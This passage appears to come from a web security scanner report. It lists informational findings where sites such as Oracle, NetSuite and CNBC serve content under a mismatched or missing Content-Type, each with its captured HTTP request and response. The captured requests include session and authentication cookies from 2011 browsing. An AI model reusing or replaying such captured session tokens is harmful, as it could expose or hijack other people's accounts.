31.86. https://www.atg.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.atg.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

31.87. https://www.atg.com/svc-common/script/propertyFunc.js.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.atg.com
Path:	/svc-common/script/propertyFunc.js.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /svc-common/script/propertyFunc.js.jsp HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

31.88. http://www.cnbc.com/id/24596694/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cnbc.com
Path:	/id/24596694/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /id/24596694/?t=20118614565362 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_noBevelAuto.swf?delay=0&config=24596694&v=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; s_cc=true; s_sq=%5B%5BB%5D%5D; adops_master_kvs=; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:54 GMT
Via: 1.1 C aicache6
Content-Length: 1144
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:00 GMT

<cnbcPromoSch>
<day name="monday">
<promoBlock start="0:00" end="3:00" id="24596692" />
<promoBlock start="3:01" end="24:00" id="24596685" />
</day>
<day name="tuesday">

...[SNIP]...

31.89. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.90. http://www.fekkai.com/js/imageLoader.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fekkai.com
Path:	/js/imageLoader.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /js/imageLoader.json HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/flash/Fekkai_Equity_ImageLoader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.331215175.1315345611.1315345611.1315345611.1; __utmb=243632410.1.10.1315345611; __utmc=243632410; __utmz=243632410.1315345611.1.1.utmcsr=fekkai.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:52 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:09:39 GMT
Accept-Ranges: bytes
Content-Length: 1055
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

{
"baseURL": "/flash/imageViewer/",
"images": [
{
"fileName": "image1.jpg",
"duration": "1.05",
"transition": "1"
},
{
"fileName": "image2.jpg",

...[SNIP]...

31.91. http://www.gillettevenus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gillettevenus.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; preferredLocale=en_US; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:40 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Tue, 10 Feb 2009 20:48:09 GMT
ETag: "2392bc-47e-462969ad35440"
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain
Content-Length: 1150

............ .h.......(....... ..... .....@....................r...s...s...s...t...s...x......w...x...x...w...r...o...m...k...l...k...m...m...n...s...[.z*...f
..v...s...t...n...m...k...h...h...h...h
...[SNIP]...

31.92. http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js?callback=(new+PopularQueryRenderer(document.getElementById(%22queries%22))).render HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://support.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:39 GMT
Expires: Tue, 06 Sep 2011 15:39:39 GMT
Cache-Control: private, max-age=86400
Content-Type: text/plain; charset=UTF-8
Content-Disposition: attachment
X-Content-Type-Options: nosniff
Server: pfe
Content-Length: 273
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

(new PopularQueryRenderer(document.getElementById("queries"))).render({
"title" : "BigCommerce Support",
"popularQueries" : [
{
"query" : "newsletter",
"num" : 10,
"href" : "http:\x2F\x2Fwww.google.c
...[SNIP]...

31.93. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

31.94. http://www.harbottle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.harbottle.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:24 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 20 Mar 2007 19:17:21 GMT
ETag: "468027-9f6-8e129240"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.95. http://www.marykay.com/images/icn_fb.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.marykay.com
Path:	/images/icn_fb.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

Response

31.96. http://www.marykay.com/images/icn_yt.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.marykay.com
Path:	/images/icn_yt.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

Response

31.97. http://www.netsuite.com/portal/javascript/effects.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.netsuite.com
Path:	/portal/javascript/effects.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/effects.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343327|PC#1315341135013-154927.19#1316551067|check#true#1315341527; bn_u=6923713758307492964; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.2.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315341851979%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22l%22%3A%22financials%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20leading%20integrated%20web-based%20business%20software%20suite%2C%20including%20business%20accounting%20software%2C%20ERP%20software%2C%20CRM%20software%20and%20ecommerce%20software.%20Effectively%20and%20efficiently%20manage%20all%20of%20your%20key%20business%20operations%20with%20one%20seamless%20business%20software%20solution!%22%2C%22ti%22%3A%22Cloud%20ERP%2C%20Business%20Accounting%20Software%2C%20CRM%2C%20Ecommerce%20%E2%80%94%20NetSuite%22%2C%22nw%22%3A475%2C%22nl%22%3A226%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 38227
Content-Disposition: inline;filename="effects.js"
NS_RTIMER_COMPOSITE: 1564763045:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=278
Date: Tue, 06 Sep 2011 15:44:12 GMT
Connection: close
Vary: Accept-Encoding

// script.aculo.us effects.js v1.7.1_beta2, Sat Apr 28 15:20:12 CEST 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (htt
...[SNIP]...

31.98. http://www.netsuite.com/portal/javascript/prototype.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.netsuite.com
Path:	/portal/javascript/prototype.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/prototype.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343327|PC#1315341135013-154927.19#1316551067|check#true#1315341527; bn_u=6923713758307492964; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.2.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315341851979%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22l%22%3A%22financials%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20leading%20integrated%20web-based%20business%20software%20suite%2C%20including%20business%20accounting%20software%2C%20ERP%20software%2C%20CRM%20software%20and%20ecommerce%20software.%20Effectively%20and%20efficiently%20manage%20all%20of%20your%20key%20business%20operations%20with%20one%20seamless%20business%20software%20solution!%22%2C%22ti%22%3A%22Cloud%20ERP%2C%20Business%20Accounting%20Software%2C%20CRM%2C%20Ecommerce%20%E2%80%94%20NetSuite%22%2C%22nw%22%3A475%2C%22nl%22%3A226%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 99594
Content-Disposition: inline;filename*=utf-8''prototype.js
NS_RTIMER_COMPOSITE: -2027149513:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=3309
Date: Tue, 06 Sep 2011 15:44:12 GMT
Connection: close
Vary: Accept-Encoding

/* Prototype JavaScript framework, version 1.5.1.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...

31.99. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oracle.com
Path:	/ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain plain text.

Request

GET /ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343418685; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fconnect%2Fface-to-face%2Fwelcome-reception%2Findex.html; s_sq=%5B%5BB%5D%5D
Range: bytes=14991-14991
If-Range: "36c4be-c94e-4a24cc10e59c0"

Response

HTTP/1.1 206 Partial Content
Last-Modified: Mon, 02 May 2011 15:34:07 GMT
ETag: "36c4be-c94e-4a24cc10e59c0"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=28865850921481418,0)
Date: Tue, 06 Sep 2011 16:10:19 GMT
Content-Range: bytes 14991-14991/51534
Content-Length: 1
Connection: close

c

31.100. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oracle.com
Path:	/ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343418685; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fconnect%2Fface-to-face%2Fwelcome-reception%2Findex.html; s_sq=%5B%5BB%5D%5D
Range: bytes=6796-44263
If-Range: "34d183-ace8-4a652c4324300"

Response

HTTP/1.1 206 Partial Content
Last-Modified: Wed, 22 Jun 2011 20:25:16 GMT
ETag: "34d183-ace8-4a652c4324300"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=90;ecid=17790542562240339,0:1)
Date: Tue, 06 Sep 2011 16:10:20 GMT
Content-Range: bytes 6796-44263/44264
Content-Length: 37468
Connection: close

...$..|*|..........o!......>C@=I..6..@i:f.........\.|...1..|..|_.%.R....tk<2.........[@..8.mMZ..Qw...-......}........-..6.X8...n.......`.......[..sw.+......g8.....?.(..9.[........J....OQ^.a.IO6.a...X
...[SNIP]...

31.101. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oracle.com
Path:	/ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343418685; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fconnect%2Fface-to-face%2Fwelcome-reception%2Findex.html; s_sq=%5B%5BB%5D%5D
Range: bytes=52777-53649
If-Range: "3cdb7b-d192-4ab599ab784c0"

Response

HTTP/1.1 206 Partial Content
Last-Modified: Thu, 25 Aug 2011 19:40:43 GMT
ETag: "3cdb7b-d192-4ab599ab784c0"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=13409314624745101,0:1)
Date: Tue, 06 Sep 2011 16:10:20 GMT
Content-Range: bytes 52777-53649/53650
Content-Length: 873
Connection: close

....i...T~.....F....uG......h...O...8?.7...........~..t~..Q.g..%..@s...G......i....T~.....F....uG......i...s?v[.@m..&~\9..4r.@....l...H.....*`=cr\...j:....?.P..,.....P......W.@....o._e./.;..5}...,.
...[SNIP]...

31.102. http://www.oracle.com/pls/ebn/live_viewer.main previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oracle.com
Path:	/pls/ebn/live_viewer.main

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/ebn/live_viewer.main HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 25
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:24 GMT
Connection: close

ORA-01403: no data found

31.103. http://www.oracle.com/pls/ebn/swf_viewer.load previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oracle.com
Path:	/pls/ebn/swf_viewer.load

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/ebn/swf_viewer.load HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 52
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:24 GMT
Connection: close

Error: loading demo ...<p>
ORA-01403: no data found

31.104. http://www.oracle.com/pls/ebn/wm_viewer.main previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oracle.com
Path:	/pls/ebn/wm_viewer.main

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/ebn/wm_viewer.main HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.105. http://www.sophelle.com/graphic/cq_logo-250.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sophelle.com
Path:	/graphic/cq_logo-250.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /graphic/cq_logo-250.gif HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.3.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A01

Response

HTTP/1.1 200 OK
Content-Length: 36615
Content-Type: image/gif
Last-Modified: Sun, 01 Nov 2009 12:24:17 GMT
Accept-Ranges: bytes
ETag: "1bc4783bee5aca1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:16 GMT

......JFIF.....H.H.... .Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2009:11:01 07:18:46.......
...[SNIP]...

32. Content type is not specified previous
There are 8 instances of this issue:

http://ads.pointroll.com/PortalServe/
https://login.oracle.com/mysso/sso_loginui/moc_lib.js
https://login.oracle.com/mysso/sso_loginui/sso_check.js
https://login.oracle.com/oam/server/sso/auth_cred_submit
https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
http://www.deloitte.com/deloitte-portal-selfservice/jquery.showLoading.js
http://www.deloitte.com/deloitte-portal-selfservice/scripts/checkbox-style.js
http://www.deloitte.com/deloitte-portal-selfservice/selfservice-api.js

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

32.1. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Request

GET /PortalServe/?pid=1398294N31620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192679/tid/ab3e2d1a-3dd3-4a1a-8843-31fbcc37982e/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.35440191673114896 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
